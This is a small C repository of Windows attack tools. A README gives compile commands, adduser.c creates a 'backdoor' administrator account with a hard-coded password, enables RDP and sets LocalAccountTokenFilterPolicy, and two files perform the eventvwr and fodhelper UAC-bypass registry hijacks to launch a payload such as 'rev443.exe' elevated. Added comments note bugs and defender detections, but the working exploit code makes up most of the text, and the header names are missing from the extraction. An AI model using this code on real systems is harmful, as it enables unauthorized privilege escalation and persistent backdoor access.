├── README.md
├── adduser.c
├── eventvwr-bypass.c
└── fodhelper-bypass.c

/README.md:
--------------------------------------------------------------------------------
# Compilitaion instructions:

## fodhelper works for both x86 and x64

### x86
i686-w64-mingw32-gcc fodhelper-bypass.c -o fodhelper-bypass-x86.exe

### x64
x86_64-w64-mingw32-gcc fodhelper-bypass.c -o fodhelper-bypassuac-x64.exe

## EventVwr works only for x64

### x64
x86_64-w64-mingw32-gcc eventvwr-bypass.c -o eventvwr-bypass-x64.exe




## Execution
fodhelper-bypass-x86.exe

eventvwr-bypass-x64.exe

--------------------------------------------------------------------------------
/adduser.c:
--------------------------------------------------------------------------------
#include
#include
#include
/* NOTE(review): the three header names above were lost when this listing was
 * extracted (the <...> operands are missing) and cannot be recovered from the
 * page, so they are left as found. */

/*
 * Entry point. Shells out via system() four times: creates a local account
 * named "backdoor" with a hard-coded password, adds it to the local
 * Administrators group, sets fDenyTSConnections to 0 and sets
 * LocalAccountTokenFilterPolicy to 1. argc/argv are unused.
 *
 * Every step is best-effort: the return value of each system() call is
 * discarded and the progress line is printed whether or not the command
 * succeeded. All four commands change machine-wide state, so they can only
 * succeed when this process already runs with an elevated token — nothing
 * here checks that.
 *
 * Defender's view: the credential is a plain string literal, so it is
 * recoverable from the compiled binary with `strings`; local account
 * creation and group-membership changes are recorded in the Security log
 * (event IDs 4720 and 4732 when account-management auditing is on); both
 * registry values are standard hardening baselines worth monitoring and
 * resetting.
 */
int main(int argc, char *argv[])
{
    printf("Creating user new user\n");
    /* Local account with a hard-coded password embedded in the binary. */
    system("net.exe user backdoor Password123! /add");

    printf("Adding user to Administrators group\n");
    system("net.exe localgroup Administrators backdoor /add");

    printf("Enabling RDP\n");
    /* fDenyTSConnections = 0 enables Remote Desktop machine-wide; /f suppresses the overwrite prompt. */
    system("reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f");

    printf("Allowing Admins access by setting LocalAccountTokenFilterPolicy to 1\n");
    /* LocalAccountTokenFilterPolicy = 1 turns off UAC token filtering for local
     * accounts used over the network; the hardened default is 0 / absent. */
    system("reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1");

    return 0;
}

--------------------------------------------------------------------------------
/eventvwr-bypass.c:
--------------------------------------------------------------------------------
#include
#include
#include
/* NOTE(review): header names lost in extraction, as in adduser.c. */

/*
 * Recursively delete the HKCU subkey named by lpSubKey together with all of
 * its subkeys (the usual "RegDelnode" recipe).
 *
 * lpSubKey is modified in place: "\\<child>" is appended while descending
 * and trimmed again before returning, so the caller must pass a writable
 * buffer with room to spare (the caller below uses MAX_PATH*2). Nothing
 * bounds the strcpy() of each child name against that buffer.
 *
 * Returns non-zero when the key is gone afterwards — deleted here, or it
 * never existed (ERROR_FILE_NOT_FOUND from RegOpenKeyEx counts as success);
 * zero on any other failure.
 */
int RegDelnodeRecurse (LPTSTR lpSubKey) {
    LPTSTR lpEnd;
    LONG lResult;
    DWORD dwSize = MAX_PATH;
    TCHAR szName[MAX_PATH];
    HKEY hKey;
    FILETIME ftWrite;

    /* Fast path: a key without subkeys deletes directly. */
    lResult = RegDeleteKey(HKEY_CURRENT_USER, lpSubKey);

    if (lResult == ERROR_SUCCESS) return 1;

    lResult = RegOpenKeyEx(HKEY_CURRENT_USER, lpSubKey, 0, KEY_READ, &hKey);

    /* A missing key is treated as already deleted. */
    if (lResult != ERROR_SUCCESS) return lResult == ERROR_FILE_NOT_FOUND;

    /* Extend the path in place with a trailing backslash; child names are
     * written after it below. */
    lpEnd = lpSubKey + lstrlen(lpSubKey);
    *lpEnd++ = '\\';
    *lpEnd = '\0';

    if (RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite) == ERROR_SUCCESS) {
        do {
            strcpy(lpEnd, szName); /* unbounded copy into the caller's buffer */
            /* Stop on the first child that cannot be removed; the final
             * RegDeleteKey below will then most likely fail as well. */
            if (!RegDelnodeRecurse(lpSubKey)) break;
            /* Always index 0: each successful delete shifts the next child into slot 0. */
            lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite);
        } while (lResult == ERROR_SUCCESS);
    }

    /* Restore the original path before the caller sees it again. */
    lpEnd--;
    *lpEnd = TEXT('\0');

    RegCloseKey(hKey);

    return RegDeleteKey(HKEY_CURRENT_USER, lpSubKey) == ERROR_SUCCESS;
}

/*
 * Delete HKCU\Software\Classes\mscfile and everything under it. The path is
 * copied into a writable MAX_PATH*2 buffer because RegDelnodeRecurse appends
 * to it. Called once before the hijack (start from a clean key) and once
 * after it (cleanup, where the return value is ignored).
 */
int RegDelnode() {
    TCHAR szDelKey[MAX_PATH*2] = "Software\\Classes\\mscfile";
    return RegDelnodeRecurse(szDelKey);
}

/*
 * Registers <current directory>\<binary> as the per-user open handler for
 * the mscfile class, launches eventvwr.exe, waits five seconds, terminates
 * the launched process and deletes the key again.
 *
 * binary: file name appended to the current directory with strcat(); neither
 *         strcat() is bounded, so a long directory or name overflows curPath
 *         (MAX_PATH). Passing NULL is undefined behaviour (main below does
 *         exactly that when no argument is given).
 *
 * The identifier starts with a double underscore, which C reserves for the
 * implementation.
 *
 * Defender's view: a per-user write to
 * HKCU\Software\Classes\mscfile\shell\open\command immediately followed by
 * an eventvwr.exe launch is the widely documented pattern of this UAC
 * bypass (MITRE ATT&CK T1548.002). Registry value-set telemetry on that path
 * (e.g. Sysmon Event ID 13) and process-lineage telemetry rooted at
 * eventvwr.exe are the usual detections; UAC at "Always notify", or not
 * working from an account in the Administrators group, is the mitigation.
 * The key lives for roughly the five-second Sleep() below, so point-in-time
 * registry audits will usually miss it — event-driven telemetry is needed.
 */
void __c_exploitUAC(const char* binary) {
    char curPath[MAX_PATH], evtVwr[MAX_PATH];
    HKEY attackKey;
    SHELLEXECUTEINFO exInfo;

    /*
    curPath is the command you want to elevate.
    Below is an example that shows how to elevate
    foobar.exe sitting in the same path as this
    program.
    */

    /*
    GetCurrentDirectory(MAX_PATH, curPath);
    strcat(curPath, "\\foobar.exe");
    */

    /* Return value of GetCurrentDirectory is not checked; both strcat() calls are unbounded. */
    GetCurrentDirectory(MAX_PATH, curPath);
    strcat(curPath, "\\");
    strcat(curPath, binary);


    /* getenv() may return NULL, which "%s" does not tolerate; sprintf() is unbounded. */
    sprintf(evtVwr, "%s\\System32\\eventvwr.exe", getenv("SYSTEMROOT"));

    if(!RegDelnode()) return;
    if(RegCreateKey(HKEY_CURRENT_USER, "Software\\Classes\\mscfile\\shell\\open\\command", &attackKey)!=ERROR_SUCCESS) return;

    /* Default value = curPath; cbData is strlen(curPath), i.e. without the terminating NUL. */
    RegSetValueEx(attackKey, "", 0, REG_SZ, curPath, strlen(curPath));

    /* Remaining SHELLEXECUTEINFO fields are left uninitialised. */
    exInfo.lpVerb = "open";
    exInfo.lpFile = evtVwr;
    exInfo.nShow = 0;
    exInfo.fMask = SEE_MASK_NOCLOSEPROCESS; /* keeps hProcess open for TerminateProcess below */
    exInfo.cbSize = sizeof(SHELLEXECUTEINFO);
    exInfo.hwnd = 0;
    exInfo.lpParameters = 0;
    exInfo.lpDirectory = 0;
    exInfo.hInstApp = 0;

    /* Return value unchecked: on failure hProcess is not a valid handle. */
    ShellExecuteEx(&exInfo);

    /* Fixed window during which the hijacked key exists. */
    Sleep(5000);

    /* Terminates the process ShellExecuteEx started, whether or not it did anything. */
    TerminateProcess(exInfo.hProcess, 0);

    RegCloseKey(attackKey);
    /* Cleanup; the result is ignored, so the key can survive when deletion fails. */
    RegDelnode();
}

/*
 * Entry point. Prints usage when the argument count is wrong but does NOT
 * return, so with no argument argv[1] (NULL) still reaches __c_exploitUAC
 * and strcat(). The binary name in the usage text differs from the one the
 * README builds (eventvwr-bypass-x64.exe); the argument placeholder in the
 * first usage line was presumably stripped during extraction — the runtime
 * strings are left as found.
 */
int main(int argc, char *argv[])
{
    if (argc != 2)
    {
        printf("Usage:\n");
        printf("\teventvwr-bypassuac-64.exe \n\n");
        printf("\tExample: eventvwr-bypassuac-64.exe rev443.exe\n");
    }

    __c_exploitUAC(argv[1]);
    return 0;
}

--------------------------------------------------------------------------------
/fodhelper-bypass.c:
--------------------------------------------------------------------------------
#include
#include
#include
/* NOTE(review): header names lost in extraction, as in adduser.c. */

/*
 * Recursively delete the HKCU subkey named by lpSubKey together with all of
 * its subkeys. Byte-for-byte the same helper as in eventvwr-bypass.c; see
 * the notes there (in-place modification of lpSubKey, unbounded strcpy(),
 * ERROR_FILE_NOT_FOUND treated as success).
 */
int RegDelnodeRecurse (LPTSTR lpSubKey) {
    LPTSTR lpEnd;
    LONG lResult;
    DWORD dwSize = MAX_PATH;
    TCHAR szName[MAX_PATH];
    HKEY hKey;
    FILETIME ftWrite;

    /* Fast path: a key without subkeys deletes directly. */
    lResult = RegDeleteKey(HKEY_CURRENT_USER, lpSubKey);

    if (lResult == ERROR_SUCCESS) return 1;

    lResult = RegOpenKeyEx(HKEY_CURRENT_USER, lpSubKey, 0, KEY_READ, &hKey);

    /* A missing key is treated as already deleted. */
    if (lResult != ERROR_SUCCESS) return lResult == ERROR_FILE_NOT_FOUND;

    /* Extend the path in place; child names are written after the backslash. */
    lpEnd = lpSubKey + lstrlen(lpSubKey);
    *lpEnd++ = '\\';
    *lpEnd = '\0';

    if (RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite) == ERROR_SUCCESS) {
        do {
            strcpy(lpEnd, szName); /* unbounded copy into the caller's buffer */
            if (!RegDelnodeRecurse(lpSubKey)) break;
            /* Always index 0: each successful delete shifts the next child into slot 0. */
            lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite);
        } while (lResult == ERROR_SUCCESS);
    }

    /* Restore the original path before the caller sees it again. */
    lpEnd--;
    *lpEnd = TEXT('\0');

    RegCloseKey(hKey);

    return RegDeleteKey(HKEY_CURRENT_USER, lpSubKey) == ERROR_SUCCESS;
}

/*
 * Delete HKCU\Software\Classes\ms-settings and everything under it. Same
 * role as in eventvwr-bypass.c, different key.
 */
int RegDelnode() {
    TCHAR szDelKey[MAX_PATH*2] = "Software\\Classes\\ms-settings";
    return RegDelnodeRecurse(szDelKey);
}

/*
 * Registers <current directory>\<binary> as the per-user open handler for
 * the ms-settings class (default value plus an empty DelegateExecute value),
 * launches fodhelper.exe, waits five seconds, terminates the launched
 * process and deletes the key again. Same structure and same unbounded
 * string handling as the eventvwr variant; the identifier is likewise a
 * reserved double-underscore name.
 *
 * Defender's view: a per-user write to
 * HKCU\Software\Classes\ms-settings\Shell\Open\command with an empty
 * DelegateExecute value, followed by a fodhelper.exe launch, is the widely
 * documented pattern of this UAC bypass (MITRE ATT&CK T1548.002). Registry
 * value-set telemetry on that path (e.g. Sysmon Event ID 13) and process
 * lineage rooted at fodhelper.exe are the usual detections; UAC at "Always
 * notify", or not working from an Administrators-group account, is the
 * mitigation. The key exists only for about the five-second Sleep() below.
 */
void __c_exploitUAC(const char* binary) {
    char curPath[MAX_PATH], fodHelper[MAX_PATH];
    HKEY attackKey;
    SHELLEXECUTEINFO exInfo;

    /*
    curPath is the command you want to elevate.
    Below is an example that shows how to elevate
    foobar.exe sitting in the same path as this
    program.
    */

    /*
    GetCurrentDirectory(MAX_PATH, curPath);
    strcat(curPath, "\\foobar.exe");
    */

    /* Return value of GetCurrentDirectory is not checked; both strcat() calls are unbounded. */
    GetCurrentDirectory(MAX_PATH, curPath);
    strcat(curPath, "\\");
    strcat(curPath, binary);


    /* getenv() may return NULL, which "%s" does not tolerate; sprintf() is unbounded. */
    sprintf(fodHelper, "%s\\System32\\fodhelper.exe", getenv("SYSTEMROOT"));

    if(!RegDelnode()) return;
    if(RegCreateKey(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\Shell\\Open\\command", &attackKey)!=ERROR_SUCCESS) return;

    /* Default value = curPath (cbData excludes the terminating NUL); DelegateExecute = empty REG_SZ, 0 bytes. */
    RegSetValueEx(attackKey, "", 0, REG_SZ, curPath, strlen(curPath));
    RegSetValueEx(attackKey, "DelegateExecute", 0, REG_SZ, "", strlen(""));

    /* Remaining SHELLEXECUTEINFO fields are left uninitialised. */
    exInfo.lpVerb = "open";
    exInfo.lpFile = fodHelper;
    exInfo.nShow = 0;
    exInfo.fMask = SEE_MASK_NOCLOSEPROCESS; /* keeps hProcess open for TerminateProcess below */
    exInfo.cbSize = sizeof(SHELLEXECUTEINFO);
    exInfo.hwnd = 0;
    exInfo.lpParameters = 0;
    exInfo.lpDirectory = 0;
    exInfo.hInstApp = 0;

    /* Return value unchecked: on failure hProcess is not a valid handle. */
    ShellExecuteEx(&exInfo);

    /* Fixed window during which the hijacked key exists. */
    Sleep(5000);

    /* Terminates the process ShellExecuteEx started, whether or not it did anything. */
    TerminateProcess(exInfo.hProcess, 0);

    RegCloseKey(attackKey);
    /* Cleanup; the result is ignored, so the key can survive when deletion fails. */
    RegDelnode();
}

/*
 * Entry point. As in eventvwr-bypass.c, the usage branch does not return,
 * so a missing argument still passes argv[1] == NULL to __c_exploitUAC.
 * The first usage line spells the binary "foodhelper" and the README builds
 * fodhelper-bypass-x86.exe / fodhelper-bypassuac-x64.exe; the argument
 * placeholder was presumably stripped during extraction. Runtime strings
 * are left as found.
 */
int main(int argc, char *argv[])
{
    if (argc != 2)
    {
        printf("Usage:\n");
        printf("\tfoodhelper-bypassuac-64.exe \n\n");
        printf("\tExample: fodhelper-bypassuac-64.exe rev443.exe\n");
    }

    __c_exploitUAC(argv[1]);
    return 0;
}

--------------------------------------------------------------------------------